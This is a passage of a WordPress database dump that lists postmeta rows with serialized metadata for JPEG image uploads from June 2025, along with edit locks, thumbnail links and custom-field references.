(1652,530,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/508840596_122233206260202781_3423997656757381309_n.jpg\";s:8:\"filesize\";i:553270;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"508840596_122233206260202781_3423997656757381309_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23489;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"508840596_122233206260202781_3423997656757381309_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:192347;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"508840596_122233206260202781_3423997656757381309_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9544;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"508840596_122233206260202781_3423997656757381309_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117896;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"508840596_122233206260202781_3423997656757381309_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:350245;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"508840596_122233206260202781_3423997656757381309_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24084;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1653,531,'_wp_attached_file','2025/06/509097393_122233208444202781_2856922640003344449_n.jpg'),
(1654,531,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/509097393_122233208444202781_2856922640003344449_n.jpg\";s:8:\"filesize\";i:492491;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"509097393_122233208444202781_2856922640003344449_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23650;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"509097393_122233208444202781_2856922640003344449_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:175487;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"509097393_122233208444202781_2856922640003344449_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9671;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"509097393_122233208444202781_2856922640003344449_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:109436;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"509097393_122233208444202781_2856922640003344449_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:315915;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"509097393_122233208444202781_2856922640003344449_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21861;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1655,532,'_wp_attached_file','2025/06/509332829_122233206698202781_2228971549485358971_n.jpg'),
(1656,532,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/509332829_122233206698202781_2228971549485358971_n.jpg\";s:8:\"filesize\";i:530075;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"509332829_122233206698202781_2228971549485358971_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24195;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"509332829_122233206698202781_2228971549485358971_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:190981;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"509332829_122233206698202781_2228971549485358971_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9776;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"509332829_122233206698202781_2228971549485358971_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118350;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"509332829_122233206698202781_2228971549485358971_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:343406;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"509332829_122233206698202781_2228971549485358971_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22978;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1657,533,'_wp_attached_file','2025/06/509382438_122233208474202781_1076240601356784110_n.jpg'),
(1658,533,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/509382438_122233208474202781_1076240601356784110_n.jpg\";s:8:\"filesize\";i:446392;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"509382438_122233208474202781_1076240601356784110_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21170;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"509382438_122233208474202781_1076240601356784110_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:161921;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"509382438_122233208474202781_1076240601356784110_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8662;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"509382438_122233208474202781_1076240601356784110_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100969;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"509382438_122233208474202781_1076240601356784110_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:289086;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"509382438_122233208474202781_1076240601356784110_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21362;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1659,534,'_wp_attached_file','2025/06/509434857_122233205768202781_2301112012794045645_n.jpg'),
(1660,534,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2025/06/509434857_122233205768202781_2301112012794045645_n.jpg\";s:8:\"filesize\";i:476150;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"509434857_122233205768202781_2301112012794045645_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23612;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"509434857_122233205768202781_2301112012794045645_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:170380;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"509434857_122233205768202781_2301112012794045645_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9298;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"509434857_122233205768202781_2301112012794045645_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107022;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"509434857_122233205768202781_2301112012794045645_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:307519;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"509434857_122233205768202781_2301112012794045645_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22764;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1661,535,'_wp_attached_file','2025/06/509590616_122233204442202781_5742782962099935264_n.jpg'),
(1662,535,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:62:\"2025/06/509590616_122233204442202781_5742782962099935264_n.jpg\";s:8:\"filesize\";i:677995;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"509590616_122233204442202781_5742782962099935264_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26337;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"509590616_122233204442202781_5742782962099935264_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:230438;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"509590616_122233204442202781_5742782962099935264_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10301;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"509590616_122233204442202781_5742782962099935264_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:242395;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"509590616_122233204442202781_5742782962099935264_n-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:417417;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"509590616_122233204442202781_5742782962099935264_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26965;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1665,514,'_thumbnail_id','523'),
(1666,514,'_edit_last','1'),
(1667,514,'title_style','default'),
(1668,514,'_title_style','field_5d1a0217cf408'),
(1669,514,'related',''),
(1670,514,'_related','field_603b51c3e183e'),
(1671,536,'title_style','default'),
(1672,536,'_title_style','field_5d1a0217cf408'),
(1673,536,'related',''),
(1674,536,'_related','field_603b51c3e183e'),
(1675,537,'_edit_lock','1751008709:1'),
(1676,538,'_wp_attached_file','2025/06/508661855_122233182278202781_1372776762413040353_n.jpg'),
(1677,538,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1076;s:4:\"file\";s:62:\"2025/06/508661855_122233182278202781_1372776762413040353_n.jpg\";s:8:\"filesize\";i:354236;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"508661855_122233182278202781_1372776762413040353_n-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16771;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"508661855_122233182278202781_1372776762413040353_n-1024x538.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:538;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117630;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"508661855_122233182278202781_1372776762413040353_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7327;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"508661855_122233182278202781_1372776762413040353_n-768x404.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:404;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72757;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:63:\"508661855_122233182278202781_1372776762413040353_n-1536x807.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:807;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:212394;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"508661855_122233182278202781_1372776762413040353_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20954;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1680,537,'_edit_last','1'),
(1681,537,'title_style','default'),
(1682,537,'_title_style','field_5d1a0217cf408'),
(1683,537,'related',''),
(1684,537,'_related','field_603b51c3e183e'),
(1685,539,'title_style','default'),
(1686,539,'_title_style','field_5d1a0217cf408'),
(1687,539,'related',''),
(1688,539,'_related','field_603b51c3e183e'),
(1691,537,'_thumbnail_id','538'),
(1696,540,'title_style','default'),
(1697,540,'_title_style','field_5d1a0217cf408'),
(1698,540,'related',''),
(1699,540,'_related','field_603b51c3e183e'),
(1702,541,'_edit_lock','1751009142:1'),
(1708,541,'_edit_last','1'),
(1709,541,'title_style','default'),
(1710,541,'_title_style','field_5d1a0217cf408'),
(1711,541,'related',''),
(1712,541,'_related','field_603b51c3e183e'),
(1713,543,'title_style','default'),
(1714,543,'_title_style','field_5d1a0217cf408'),
(1715,543,'related',''),
(1716,543,'_related','field_603b51c3e183e'),
(1718,544,'_wp_attached_file','2025/06/508745932_122233182272202781_2147005512618392889_n.jpg'),
(1719,544,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1076;s:4:\"file\";s:62:\"2025/06/508745932_122233182272202781_2147005512618392889_n.jpg\";s:8:\"filesize\";i:310973;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"508745932_122233182272202781_2147005512618392889_n-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15673;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"508745932_122233182272202781_2147005512618392889_n-1024x538.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:538;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105629;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"508745932_122233182272202781_2147005512618392889_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7210;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"508745932_122233182272202781_2147005512618392889_n-768x404.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:404;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65085;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:63:\"508745932_122233182272202781_2147005512618392889_n-1536x807.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:807;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:186742;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"508745932_122233182272202781_2147005512618392889_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19254;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1723,541,'_thumbnail_id','544'),
(1730,546,'_edit_lock','1751009749:1'),
(1731,547,'_wp_attached_file','2025/06/508860809_122233022552202781_5930562876512911766_n.jpg'),
(1732,547,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:62:\"2025/06/508860809_122233022552202781_5930562876512911766_n.jpg\";s:8:\"filesize\";i:584274;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"508860809_122233022552202781_5930562876512911766_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24226;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"508860809_122233022552202781_5930562876512911766_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:207819;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"508860809_122233022552202781_5930562876512911766_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9921;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"508860809_122233022552202781_5930562876512911766_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:216134;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"508860809_122233022552202781_5930562876512911766_n-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:369739;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"508860809_122233022552202781_5930562876512911766_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24846;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1735,546,'_thumbnail_id','547'),
(1736,546,'_edit_last','1'),
(1737,546,'title_style','default'),
(1738,546,'_title_style','field_5d1a0217cf408'),
(1739,546,'related',''),
(1740,546,'_related','field_603b51c3e183e'),
(1741,548,'title_style','default'),
(1742,548,'_title_style','field_5d1a0217cf408'),
(1743,548,'related',''),
(1744,548,'_related','field_603b51c3e183e'),
(1745,549,'_edit_lock','1751009720:1'),
(1746,550,'_wp_attached_file','2025/06/509590616_122233204442202781_5742782962099935264_n-1.jpg'),
(1747,550,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:64:\"2025/06/509590616_122233204442202781_5742782962099935264_n-1.jpg\";s:8:\"filesize\";i:677995;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"509590616_122233204442202781_5742782962099935264_n-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26337;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"509590616_122233204442202781_5742782962099935264_n-1-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:230438;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"509590616_122233204442202781_5742782962099935264_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10301;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"509590616_122233204442202781_5742782962099935264_n-1-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:242395;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"509590616_122233204442202781_5742782962099935264_n-1-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:417417;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"509590616_122233204442202781_5742782962099935264_n-1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26965;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1750,549,'_edit_last','1'),
(1751,549,'title_style','default'),
(1752,549,'_title_style','field_5d1a0217cf408'),
(1753,549,'related',''),
(1754,549,'_related','field_603b51c3e183e'),
(1755,551,'title_style','default'),
(1756,551,'_title_style','field_5d1a0217cf408'),
(1757,551,'related',''),
(1758,551,'_related','field_603b51c3e183e'),
(1761,549,'_thumbnail_id','550'),
(1766,552,'_edit_lock','1751009596:1'),
(1767,553,'_wp_attached_file','2025/06/510226912_122233485428202781_3363047737425267891_n-2.jpg'),
(1768,553,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:64:\"2025/06/510226912_122233485428202781_3363047737425267891_n-2.jpg\";s:8:\"filesize\";i:579804;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"510226912_122233485428202781_3363047737425267891_n-2-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26550;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"510226912_122233485428202781_3363047737425267891_n-2-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:207115;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"510226912_122233485428202781_3363047737425267891_n-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10300;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"510226912_122233485428202781_3363047737425267891_n-2-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:217453;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"510226912_122233485428202781_3363047737425267891_n-2-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:364266;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"510226912_122233485428202781_3363047737425267891_n-2-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22739;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1771,552,'_thumbnail_id','553'),
(1772,552,'_edit_last','1'),
(1773,552,'title_style','default'),
(1774,552,'_title_style','field_5d1a0217cf408'),
(1775,552,'related',''),
(1776,552,'_related','field_603b51c3e183e'),
(1777,554,'title_style','default'),
(1778,554,'_title_style','field_5d1a0217cf408'),
(1779,554,'related',''),
(1780,554,'_related','field_603b51c3e183e'),
(1790,556,'title_style','default'),
(1791,556,'_title_style','field_5d1a0217cf408'),
(1792,556,'related',''),
(1793,556,'_related','field_603b51c3e183e'),
(1800,557,'title_style','default'),
(1801,557,'_title_style','field_5d1a0217cf408'),
(1802,557,'related',''),
(1803,557,'_related','field_603b51c3e183e'),
